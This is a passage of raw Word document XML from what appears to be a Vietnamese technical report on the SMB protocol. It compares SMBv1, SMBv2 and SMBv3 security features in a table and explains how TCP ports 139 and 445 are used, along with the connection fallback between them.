        <w:t xml:space="preserve"> của SMBv1. Khi SMBv1 bị vô hiệu hóa, máy chủ không còn tiếp nhận các yêu cầu SMBv1 thuộc bề mặt khai thác của MS17-010; vì vậy nguy cơ khai thác nhóm lỗ hổng này qua SMBv1 được loại bỏ trong cấu hình đó [7], [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6407B3C6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 1.1: So sánh đặc tính kỹ thuật cơ bản giữa SMBv1, SMBv2 và SMBv3 [1], [3], [6], [7], [8].</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2196"/>
        <w:gridCol w:w="2196"/>
        <w:gridCol w:w="2196"/>
        <w:gridCol w:w="2196"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="6F75B41D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="16889B4F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Đặc tính kỹ thuật</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="11BADA27" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SMBv1 (CIFS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="484FC357" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SMBv2 (2.0.2 / 2.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="3705AAC9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SMBv3 (3.0 / 3.0.2 / 3.1.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="6C27FD18" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="118BA73C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Hệ điều hành đầu tiên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="359B7573" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows 2000 / XP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="27F58FA6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows Vista / Server 2008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1294A91A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows 8 / Server 2012 / Win 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="462AC8B9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="552579D4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Số lượng mã lệnh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="19BF9A73" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Hơn 100 mã lệnh (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SMB_COM_*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6694FED9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>19 mã lệnh (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SMB2_*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7D01B933" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>19 mã lệnh tiêu chuẩn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="6CE65B4B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="726329F6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cơ chế xử lý lệnh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="614DAA84" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tuần tự từng bước</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7B93765F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Hỗ trợ gộp lệnh (Compounding)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="63311458" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Gộp lệnh tối ưu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="2FE7BADD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="5C493897" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cổng mạng kết nối</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="000CEBE0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>TCP 139 và TCP 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0AC19CE3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>TCP 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="40AC5FE5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>TCP 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="18D5FE4D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="67F87C69" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ký số (SMB Signing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="42C9B6F7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>MD5-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4F7CEE02" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>HMAC-SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="06C3991F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>AES-CMAC (3.0 / 3.0.2); GMAC trên một số hệ thống mới hỗ trợ SMB 3.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="09BD9B4E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="648980C0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mã hóa dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0A1D291C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không có SMB Encryption tích hợp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="1BBEC51B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không hỗ trợ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="009C5D8D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>AES-128-CCM (3.0); AES-128-GCM (3.1.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="28FD56C9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="49FBB1D7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Bảo vệ tiền xác thực</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="57E2546A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không hỗ trợ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="20CD5DCC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không hỗ trợ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0194152F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Chỉ SMB 3.1.1: Pre-authentication Integrity dùng SHA-512</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="4475E98C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="19F72508" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cơ chế bảo vệ nổi bật</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="395451E0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Giao thức legacy, không có encryption tích hợp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="72D5D5C7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ký số HMAC-SHA256, hỗ trợ gộp lệnh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="10771BE5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mã hóa khối AES và bảo vệ toàn vẹn tùy dialect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A8D7307" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="1F82C536" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.1.4. Phân tích cổng mạng TCP 139 và TCP 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D47138" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Để trao đổi dữ liệu giữa Client và Server, hệ điều hành Windows sử dụng hai cổng dịch vụ mạng chính với cơ chế hoạt động khác nhau [1], [2]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0871EC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cổng TCP 139 (NetBIOS over TCP/IP - NBT):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Là cổng giao tiếp truyền thống của SMB thời kỳ đầu, vận hành qua tầng trung gian NetBIOS Session Service (RFC 1001/1002). Để gửi gói tin SMB tới cổng 139, hai máy trạm bắt buộc phải thiết lập phiên NetBIOS trước tiên và phân giải tên máy thông qua WINS hoặc phát quảng bá (Broadcast). Cơ chế này phụ thuộc vào cấu hình tên NetBIOS, độ trễ cao và khó định tuyến qua các mạng diện rộng [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120738E3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cổng TCP 445 (Direct-hosted SMB):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Được đưa vào sử dụng từ Windows 2000 nhằm loại bỏ tầng trung gian NetBIOS. Các gói tin SMB được đóng gói trực tiếp trên giao thức TCP (chỉ kèm theo một tiêu đề ngắn 4-byte chỉ thị độ dài). Cổng 445 hỗ trợ phân giải địa chỉ trực tiếp qua DNS hoặc kết nối thẳng bằng địa chỉ IP, tối ưu tốc độ truyền tải và tương thích với hạ tầng định tuyến IP hiện đại [2], [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1E2140" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cơ chế thử cổng và lùi bước (Fallback):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EE6459" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Khi một máy trạm Windows khởi tạo kết nối tới máy chủ chia sẻ tệp, ngăn xếp mạng mặc định sẽ gửi đồng thời hai gói tin bắt tay TCP SYN đến cả cổng 445 và cổng 139 của máy đích [2]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C8AD7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
